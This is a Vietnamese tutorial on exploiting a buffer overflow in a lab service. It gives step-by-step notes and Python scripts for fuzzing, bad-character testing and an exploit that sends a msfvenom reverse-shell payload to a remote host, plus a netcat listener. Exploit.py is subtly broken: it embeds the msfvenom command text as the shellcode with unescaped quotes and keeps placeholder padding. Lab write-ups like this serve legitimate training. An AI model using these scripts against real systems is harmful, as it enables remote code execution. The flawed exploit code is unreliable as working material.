Quy trình khai thác lỗ hổng BUFFER OVERFLOW (BOF)

FUZZING (Phun một mảng ký tự liên tục vào cổng nhận dữ liệu của mục tiêu, tìm kiếm chức năng nào cho phép làm được điều này, ví dụ Vulnserver là 'TRUN /.:/')
|
PATTERN (Dùng 1 chuỗi ký tự mẫu, sử dụng metasploit để khởi tạo chuỗi này, sau đó dùng chúng để xác định vị trí bytes bắt đầu của EIP, hoặc còn gọi là giới hạn số bytes tối thiểu của chuỗi kỹ tự có thể gây crashed)
|
OVERWRITING EIP (Ghi đè 4 ký tự bytes bất kỳ lên ô nhớ - offset EIP để chuẩn bị cho RCE)
|
BAD CHARS (Tiếp tục sử dụng các kỹ tự badchars để kiểm tra tính nguyên vẹn của payload RCE sẽ gởi, nếu có sự xuất hiện của byte '\xB0' thì việc RCE sẽ không thể xảy ra. Vì payload sẽ bị trục trặc không nguyên vẹn trong quá trình khai thác.)
|
MODULES (sử dụng nasm JMP ESP -> FFE4 -> !mona modules -> !mona find -s "\xff\xe4" -m essfunc.dll -> vị trí bytes EIP -> 625011af -> little endian -> "\xaf\x11\x50\x62" <- vị trí EIP 'trùm cuối')
|
GENERATING SHELLCODE (Sử dụng msfvenom để tạo 1 payload shellcode, kết hợp với vị trí EIP ta vừa tìm được viết kịch bản khai thác RCE mục tiêu thôi nào!)

Tham khảo: https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
Tạo các script: Fuzzer.py ; Create.py ; BadChars.py ; Exploit.py

Fuzzer.py:
```
#!/usr/bin/env python3

import socket, time, sys

ip = "MACHINE_IP"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
```

Create.py:
```
#!/usr/bin/env python3

import socket, time, sys

ip = "MACHINE_IP"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

try:
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)
    print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
    s.send(bytes(string, "latin-1"))
    s.recv(1024)
except:
  print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
  sys.exit(0)
```

BadChars.py:
```
#!/usr/bin/env python3

import socket, time, sys

ip = "MACHINE_IP"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "
badChars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
string = prefix + "A" * 100 + "B" * 4 + badChars

try:
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)
    print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
    s.send(bytes(string, "latin-1"))
    s.recv(1024)
except:
  print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
  sys.exit(0)
```
Exploit.py
```
#!/usr/bin/env python3

import socket, time, sys

ip = "MACHINE_IP"
shellcode = (
"msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.92 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c"
)
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
#6250afc7
string = prefix + "A" * 100 + "\xc7\xaf\x50\x62" + shellcode

try:
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)
    print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
    s.send(bytes(string, "latin-1"))
    s.recv(1024)
except:
  print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
  sys.exit(0)
```

Dùng netcat để lắng nghe reverse shell:
nc -lvnp 4444
